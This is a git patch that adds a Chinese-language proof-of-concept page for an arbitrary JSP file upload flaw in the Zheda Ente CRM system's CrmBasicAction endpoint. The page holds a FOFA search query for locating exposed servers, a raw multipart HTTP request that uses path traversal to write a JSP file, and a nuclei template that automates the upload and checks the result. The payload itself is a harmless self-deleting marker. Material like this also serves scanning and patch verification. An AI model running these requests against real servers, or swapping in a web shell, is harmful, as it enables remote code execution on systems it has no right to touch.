From 6500e39a1e92bad249b39b984914028cae034558 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 16 Jan 2024 19:11:22 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B5=99=E5=A4=A7=E6=81=A9=E7=89=B9?= =?UTF-8?q?=E5=AE=A2=E6=88=B7=E8=B5=84=E6=BA=90=E7=AE=A1=E7=90=86=E7=B3=BB?= =?UTF-8?q?=E7=BB=9Fcrmbasicaction=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6?= =?UTF-8?q?=E4=B8=8A=E4=BC=A0.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...客户资源管理系统crmbasicaction任意文件上传.md | 90 +++++++++++++++++++ 1 file changed, 90 insertions(+) create mode 100644 浙大恩特客户资源管理系统crmbasicaction任意文件上传.md diff --git a/浙大恩特客户资源管理系统crmbasicaction任意文件上传.md b/浙大恩特客户资源管理系统crmbasicaction任意文件上传.md new file mode 100644 index 0000000..9325d85 --- /dev/null +++ b/浙大恩特客户资源管理系统crmbasicaction任意文件上传.md @@ -0,0 +1,90 @@ +## 浙大恩特客户资源管理系统crmbasicaction任意文件上传 + +浙大恩特客户资源管理系统中的crmbasicaction接口存在安全漏洞,允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。 + +## fofa +``` +app="浙大恩特客户资源管理系统" +``` + +## poc +``` +POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36 +Content-Length: 267 +Accept-Encoding: gzip +Connection: close +Content-Type: multipart/form-data; boundary=0rwysvgvy7rxv790mpju + +--0rwysvgvy7rxv790mpju +Content-Disposition: form-data; name="file"; filename="../../mqh8qxe3cy.jsp" +Content-Type: application/zip + +<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> +--0rwysvgvy7rxv790mpju-- +``` + +![3a3a1bb6be6134a688029b7e4d757cd4](https://github.com/wy876/POC/assets/139549762/75ccec48-a0ad-4ca6-abd7-fdd2635ba5ef) + +![9f14d667e2ff13898bf0e9f6e33fe1d5](https://github.com/wy876/POC/assets/139549762/b4355528-ae24-4dfa-962b-eaa779bc6ba7) + +访问上传的文件 +/enterdoc/dao{{filepath}}{{filename}}.jsp + + +## nuclei +``` + +id: zhedaente-entsoft-CrmBasicAction-upload + +info: + name: 浙大恩特客户资源管理系统-crmbasicaction-任意文件上传 + author: rain + severity: critical + metadata: + fofa-query: title="欢迎使用浙大恩特客户资源管理系统" || body="script/Ent.base.js" || app="浙大恩特客户资源管理系统" +variables: + filename: "{{to_lower(rand_base(10))}}" + boundary: "{{to_lower(rand_base(20))}}" + +http: + - raw: + - | + POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36 + Connection: close + Content-Type: multipart/form-data; boundary={{boundary}} + Accept-Encoding: gzip + + --{{boundary}} + Content-Disposition: form-data; name="file"; filename="../../{{filename}}.jsp" + Content-Type: application/zip + + <% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> + --{{boundary}}-- + + - |+ + GET /enterdoc/dao{{filepath}}{{filename}}.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36 + Content-Length: 0 + Accept-Encoding: gzip, deflate + Connection: close + + extractors: + - type: regex + name: filepath + part: body + internal: true + group: 1 + regex: + - '(/\d+/)' + + + matchers: + - type: dsl + dsl: + - "status_code_2 == 200 && contains(body_2,'12321')" +```